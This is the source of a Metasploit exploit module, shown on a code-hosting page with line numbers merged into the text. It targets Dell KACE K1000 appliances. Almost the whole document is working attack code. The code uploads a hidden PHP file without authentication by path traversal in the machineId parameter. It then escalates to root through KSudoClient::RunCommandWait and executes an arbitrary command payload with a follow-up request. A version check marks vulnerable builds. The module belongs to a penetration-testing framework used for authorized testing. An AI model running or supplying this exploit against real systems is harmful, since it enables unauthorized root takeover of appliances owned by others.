CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/unix/http/dell_kace_k1000_upload.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote6Rank = ExcellentRanking78include Msf::Exploit::Remote::HttpClient910def initialize(info = {})11super(update_info(info,12'Name' => 'Dell KACE K1000 File Upload',13'Description' => %q{14This module exploits a file upload vulnerability in Kace K100015versions 5.0 to 5.3, 5.4 prior to 5.4.76849 and 5.5 prior to 5.5.9054716which allows unauthenticated users to execute arbitrary commands17under the context of the 'www' user.1819This module also abuses the 'KSudoClient::RunCommandWait' function20to gain root privileges.2122This module has been tested successfully with Dell KACE K100023version 5.3.24},25'License' => MSF_LICENSE,26'Privileged' => true,27'Platform' => 'unix', # FreeBSD28'Arch' => ARCH_CMD,29'Author' =>30[31'Bradley Austin (steponequit)', # Initial discovery and exploit32'bcoles', # Metasploit33],34'References' =>35[36['URL', 'http://console-cowboys.blogspot.com/2014/03/the-curious-case-of-ninjamonkeypiratela.html']37],38'Payload' =>39{40'Space' => 1024,41'BadChars' => "\x00\x27",42'DisableNops' => true,43'Compat' =>44{45'PayloadType' => 'cmd',46'RequiredCmd' => 'generic perl'47}48},49'DefaultTarget' => 0,50'Targets' =>51[52['Automatic Targeting', { 'auto' => true }]53],54'DisclosureDate' => '2014-03-07'))55end5657def check58res = send_request_cgi('uri' => normalize_uri('service', 'kbot_upload.php'))59unless res60vprint_error('Connection failed')61return Exploit::CheckCode::Unknown62end63if res.code && res.code == 500 && res.headers['X-DellKACE-Appliance'].downcase == 'k1000'64if res.headers['X-DellKACE-Version'] =~ /\A([0-9])\.([0-9])\.([0-9]+)\z/65vprint_status("Found Dell KACE K1000 version #{res.headers['X-DellKACE-Version']}")66if $1.to_i == 5 && $2.to_i <= 3 # 5.0 to 5.367return Exploit::CheckCode::Vulnerable68elsif $1.to_i == 5 && $2.to_i == 4 && $3.to_i <= 76849 # 5.4 prior to 5.4.7684969return Exploit::CheckCode::Vulnerable70elsif $1.to_i == 5 && $2.to_i == 5 && $3.to_i <= 90547 # 5.5 prior to 5.5.9054771return Exploit::CheckCode::Vulnerable72end73return Exploit::CheckCode::Safe74end75return Exploit::CheckCode::Detected76end77Exploit::CheckCode::Safe78end7980def exploit81# upload payload82fname = ".#{rand_text_alphanumeric(rand(8) + 5)}.php"83payload_path = "/kbox/kboxwww/tmp/"84post_data = "<?php require_once 'KSudoClient.class.php';KSudoClient::RunCommandWait('rm #{payload_path}#{fname};#{payload.encoded}');?>"85print_status("Uploading #{fname} (#{post_data.length} bytes)")86res = send_request_cgi(87'uri' => normalize_uri('service', 'kbot_upload.php'),88'method' => 'POST',89'vars_get' => Hash[{90'filename' => fname,91'machineId' => "#{'../' * (rand(5) + 4)}#{payload_path}",92'checksum' => 'SCRAMBLE',93'mac' => rand_text_alphanumeric(rand(8) + 5),94'kbotId' => rand_text_alphanumeric(rand(8) + 5),95'version' => rand_text_alphanumeric(rand(8) + 5),96'patchsecheduleid' => rand_text_alphanumeric(rand(8) + 5) }.to_a.shuffle],97'data' => post_data)9899unless res100fail_with(Failure::Unreachable, 'Connection failed')101end102103if res.code && res.code == 200104print_good('Payload uploaded successfully')105else106fail_with(Failure::UnexpectedReply, 'Unable to upload payload')107end108109# execute payload110res = send_request_cgi('uri' => normalize_uri('tmp', fname))111112unless res113fail_with(Failure::Unreachable, 'Connection failed')114end115116if res.code && res.code == 200117print_good('Payload executed successfully')118elsif res.code && res.code == 404119fail_with(Failure::NotVulnerable, "Could not find payload '#{fname}'")120else121fail_with(Failure::UnexpectedReply, 'Unable to execute payload')122end123end124end125126127